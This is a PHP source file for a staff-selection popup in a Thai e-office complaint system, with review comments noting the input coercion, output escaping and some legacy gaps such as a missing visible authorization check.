Current File : /var/www/html/pathumthani_eoffice/application/ecomplain/popup_select_org.php
<?
// Prologue for the staff-picker popup: opens the session, loads shared
// configuration and starts the page timer.
// NOTE(review): no login or permission check is visible in this file; confirm
// that one of the includes below enforces it before any query runs.

// $_SESSION['session_ap'] is written and read further down in this file.
session_start();
//$bypass=1;

// presumably defines $profile_groupmember, $profile_staffgroup and $table_staff,
// none of which are assigned in this file; verify against config.inc.php
include("../../config/config.inc.php");
$table_groupmember = $profile_groupmember;
$table_staffgroup= $profile_staffgroup;
// NOTE(review): $db_mode is not read in this file; presumably consumed by the include below
$db_mode="self";
//insert timeQuery
// getmicrotime() is not defined in this file; presumably provided by this include
include("../../common/common_system.inc.php"); 
$ApplicationName="ecomplain"; 
$time_start = getmicrotime();  
//insert timeQuery
?>
<SCRIPT language="javascript">
function mOvr(src, clrOver) {
    // Skip the colour change when the pointer arrived from an element nested in src.
    var cameFromInside = src.contains(event.fromElement);
    if (cameFromInside) {
        return;
    }
    src.bgColor = clrOver;
}

function mOut(src, clrIn) {
    // Skip the colour change when the pointer is moving to an element nested in src.
    var goingInside = src.contains(event.toElement);
    if (goingInside) {
        return;
    }
    src.bgColor = clrIn;
}

function showEle(divname) {
    // Toggle the element between hidden ('none') and shown ('block').
    var hidden = document.getElementById(divname).style.display == 'none';
    document.getElementById(divname).style.display = hidden ? 'block' : 'none';
}

function checkEle(divname) {
    // Show the element only while the last option of the "getting" select
    // in the "post" form is the selected one; hide it otherwise.
    var lastChosen = document.post.getting.selectedIndex == document.post.getting.length - 1;
    var target = document.getElementById(divname);
    target.style.display = lastChosen ? 'block' : 'none';
}
function openEle(divname) {
    // Force the element visible.
    var target = document.getElementById(divname);
    target.style.display = 'block';
}
function closeEle(divname) {
    // Force the element hidden.
    var target = document.getElementById(divname);
    target.style.display = 'none';
}

</SCRIPT>

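<?php
// Request handler for the staff-picker popup.
//   POST : reads the ticked staff ids from $_POST['checkbox'], looks up their
//          names, stores the id list in $_SESSION['session_ap'][$id] and emits a
//          script that copies the selection into the opener window's form.
//   other: loads the staff already attached to document $id into $person_check
//          so the form further down can pre-tick them.
//
// NOTE(review): $id, $type and $table_staff are never assigned in this file;
// presumably they come from the includes or from register_globals. $id and
// $type are treated as untrusted request input below.
// NOTE(review): no CSRF token or per-document authorization check is visible
// here; confirm one exists upstream.
// NOTE(review): the mysql_* extension is kept because the connection is opened
// elsewhere; it cannot bind parameters, so every value placed in SQL below is
// forced to an integer first.

// The document id is only compared with a numeric column, so coerce it.
$doc_id = (isset($id) && is_scalar($id)) ? intval($id) : 0;

// Byte-wise escaping for a value placed inside a quoted JavaScript string that
// sits in an inline <script> element (json_encode is avoided because the page
// is windows-874, not UTF-8).
$js_escape_map = array(
    "\\" => "\\\\",
    "\"" => "\\\"",
    "'"  => "\\'",
    "\r" => "\\r",
    "\n" => "\\n",
    "<"  => "\\x3C",
    ">"  => "\\x3E",
    "&"  => "\\x26",
);

if ($_SERVER['REQUEST_METHOD'] == "POST") {

    $xtype = "";
    $show_sid = "";

    // Keep only positive integer ids; anything else in the posted array is dropped.
    // assumes staffid is an integer column, as the unquoted comparison in the
    // original query implies; TODO confirm
    $staff_ids = array();
    if (isset($_POST['checkbox']) && is_array($_POST['checkbox'])) {
        foreach ($_POST['checkbox'] as $num) {
            if (!is_scalar($num)) {
                continue;
            }
            $staff_id = intval($num);
            if ($staff_id > 0) {
                $staff_ids[$staff_id] = $staff_id;
            }
        }
    }

    if ($staff_ids) {
        $id_list = implode(",", $staff_ids);
        // Trailing comma kept: the session value is later split on "," by the form code.
        $xtype = $id_list . ",";
        $select_code = "AND $table_staff.staffid IN ($id_list)";

        $sql_check_group = "
SELECT
$table_staff.staffid,
$table_staff.prename,
$table_staff.staffname,
$table_staff.staffsurname
FROM
$table_staff
WHERE
$table_staff.username NOT LIKE  'admin_%'
AND $table_staff.username NOT LIKE  'root%'
$select_code

";

        $results = mysql_query($sql_check_group);
        if (!$results) {
            // Driver error text goes to the server log, not to the browser.
            error_log("popup_select_org.php staff lookup failed: " . mysql_error());
            die("Query line " . __LINE__ . " error");
        }

        $names = array();
        while ($rs_slist = mysql_fetch_assoc($results)) {
            $names[] = $rs_slist['prename'] . $rs_slist['staffname'] . " " . $rs_slist['staffsurname'];
        }
        $show_sid = implode(" , ", $names);
    }

    $_SESSION['session_ap'][$id] = $xtype;

    // Values handed to the inline scripts below, escaped for the JS-string context.
    $js_sid = strtr(rtrim($xtype, ","), $js_escape_map);
    $js_show_sid = strtr($show_sid, $js_escape_map);
?>
<SCRIPT language="javascript">
var xvar = new Array('<?php echo $js_sid; ?>');
opener.document.post.sid.value=xvar;
opener.document.post.sid_show.value="<?php echo $js_show_sid; ?>";
//opener.document.post.activity_person.checked="true";
 window.close();
</SCRIPT>
<?php
    if (isset($type) && $type == "sendnone") {
?>
<SCRIPT language="javascript">
var xvar = new Array('<?php echo $js_sid; ?>');
opener.document.post1.sid.value=xvar;
opener.document.post1.sid_show.value="<?php echo $js_show_sid; ?>";
//opener.document.post1.activity_person.checked="true";
 window.close();
</SCRIPT>
<?php
    }
} else {
    $sql_history = "
SELECT
document.`status`,
document.time_rec,
document.owner,
doc_receive.status,
doc_receive.staff_id,
doc_receive.group_id,
$table_staff.prename,
$table_staff.staffname,
$table_staff.staffsurname
FROM
doc_receive
Inner Join document ON doc_receive.docid = document.id
Inner Join $table_staff ON doc_receive.staff_id = $table_staff.staffid
WHERE
document.id = $doc_id
Group by $table_staff.staffid
";
    $result = mysql_query($sql_history);
    if (!$result) {
        // Driver error text goes to the server log, not to the browser.
        error_log("popup_select_org.php history lookup failed: " . mysql_error());
        die("Query line " . __LINE__ . " error");
    }
    while ($hrs = mysql_fetch_assoc($result)) {
        // Only rows without a group_id mark an individually assigned person.
        if (!$hrs['group_id']) {
            $person_check[$hrs['staff_id']] = $hrs['staff_id'];
        }
    }
}
?>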



<HTML>
<HEAD>
<TITLE> àÅ×Í¡ºØ¤¤Å</TITLE>
<META http-equiv="Content-Type" content="text/html; charset=windows-874">
<SCRIPT type="text/javascript" src="dtree/dtree.js"></SCRIPT>
<SCRIPT src="../../common/functions.js" type="text/javascript" language="javascript"></SCRIPT>
<LINK href="../../common/style_menu.css" rel=StyleSheet type="text/css">
<LINK href="../../common/dtree.css" rel="StyleSheet" type="text/css"  />
<LINK href="../../common/style.css" rel="stylesheet" type="text/css">
</HEAD>
<BODY bgcolor="#FFFFFF">
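<?php /* $PHP_SELF and $type are request-derived, so both are escaped for the attribute context; 'ISO-8859-1' keeps htmlspecialchars byte-wise so the windows-874 page text is untouched. */ ?>
<FORM action="<?php echo htmlspecialchars($PHP_SELF, ENT_QUOTES, 'ISO-8859-1'); ?>?type=<?php echo htmlspecialchars(urlencode($type), ENT_QUOTES, 'ISO-8859-1'); ?>&action=add" name="post" method="post" enctype="multipart/form-data" onSubmit="return check();">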
<TABLE width="101%" border="0" align="right" cellpadding="10" cellspacing="0">
<TR>
<TD height="18">

<TABLE width="100%" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
	<TR>
		<TD><TABLE width="100%" border="0" cellspacing="1" cellpadding="1">
			<TR>
				<TD colspan="2" bgcolor="#CCCCCC"><TABLE width="100%" border="0" cellspacing="0" cellpadding="0">
						<TR>
							<TD align="left"><STRONG>ºØ¤¤Å</STRONG></TD>
							<TD align="right"><INPUT type="submit" name="Button" value="ºÑ¹·Ö¡¢éÍÁÙÅ" onClick="sendvalue();"></TD>
						</TR>
					</TABLE></TD>
			</TR>
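<?php
// Renders one checkbox row per staff member. A row is pre-ticked when its id
// is in the selection saved in $_SESSION['session_ap'][$id] or in
// $person_check (filled earlier in this file on non-POST requests).

// Byte-wise HTML escaping: the page is windows-874, which htmlspecialchars does
// not know, and 'ISO-8859-1' leaves every non-ASCII byte untouched.
$html_charset = 'ISO-8859-1';

$ch = array();
$saved_selection = isset($_SESSION['session_ap'][$id]) ? $_SESSION['session_ap'][$id] : "";
foreach (explode(",", $saved_selection) as $val) {
    if ($val) {
        $ch[$val] = "on";
    }
}


// NOTE(review): this query does not select gid or staffid, so both array keys
// below are empty and $list collapses to a single entry; $list is not read
// anywhere in this file. Kept as-is; confirm whether it can be dropped.
$sql_groupmember="
SELECT
$table_staff.prename,
$table_staff.staffname,
$table_staff.staffsurname
FROM
$table_staff
Inner Join $table_groupmember ON $table_groupmember.staffid = $table_staff.staffid
WHERE
$table_staff.username NOT LIKE  'admin_%'
AND $table_staff.username NOT LIKE  'root%'
";
$result = mysql_query($sql_groupmember);
if (!$result) {
    // Driver error text goes to the server log, not to the browser.
    error_log("popup_select_org.php group member lookup failed: " . mysql_error());
    die("Query line " . __LINE__ . " error");
}
while ($rs_list = mysql_fetch_assoc($result)) {
    $gid_key = isset($rs_list['gid']) ? $rs_list['gid'] : "";
    $sid_key = isset($rs_list['staffid']) ? $rs_list['staffid'] : "";
    $list[$gid_key][$sid_key] = $rs_list['prename'] . $rs_list['staffname'] . " " . $rs_list['staffsurname'];
}


$sql_group="
SELECT
$table_staff.staffid,
$table_staff.prename,
$table_staff.staffname,
$table_staff.staffsurname
FROM
$table_staff
WHERE
$table_staff.username NOT LIKE  'admin_%'
AND $table_staff.username NOT LIKE  'root%'
ORDER by $table_staff.staffid ASC
";
$result = mysql_query($sql_group);
if (!$result) {
    // Driver error text goes to the server log, not to the browser.
    error_log("popup_select_org.php staff list failed: " . mysql_error());
    die("Query line " . __LINE__ . " error");
}
while ($hrs = mysql_fetch_assoc($result)) {
    $staff_key = $hrs['staffid'];
    $is_checked = (isset($ch[$staff_key]) && $ch[$staff_key] == "on") || !empty($person_check[$staff_key]);
    // Database values are escaped before they reach attribute or text context.
    $staff_id_html = htmlspecialchars($staff_key, ENT_QUOTES, $html_charset);
    $full_name_html = htmlspecialchars($hrs['prename'] . $hrs['staffname'] . " " . $hrs['staffsurname'], ENT_QUOTES, $html_charset);
?>
			<TR>
				<TD align="left" valign="top">
					<INPUT type="checkbox" name="checkbox[<?php echo $staff_id_html; ?>]" value="<?php echo $staff_id_html; ?>" <?php if ($is_checked) { echo " checked "; } ?>>
					<?php echo $full_name_html; ?></TD>
			</TR>
<?php } ?>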
			<TR>
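				<TD colspan="2"><INPUT name="id" type="hidden" id="id"  readonly="readonly" value="<?php /* $id is request-derived; escaped byte-wise for the attribute context */ echo htmlspecialchars($id, ENT_QUOTES, 'ISO-8859-1'); ?>"/></TD>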
			</TR>
			<TR>
				<TD colspan="2">&nbsp;</TD>
			</TR>
		</TABLE></TD>
	</TR>
</TABLE></TD>
</TR>  
</TABLE>
</FORM>
</BODY>
</HTML><?
// Page-timing epilogue: takes the end timestamp and hands the timing to
// writetime2db(), which is not defined in this file.
// NOTE(review): this file assigns $time_start (in the prologue) and $time_end
// (below), but the call passes $timestart and $timeend, which are not assigned
// anywhere in this file. Either a typo or globals set by an include; confirm
// against writetime2db() before changing.
//insert timeQuery
 $time_end = getmicrotime();
  writetime2db($timestart,$timeend);
//insert timeQuery
?>
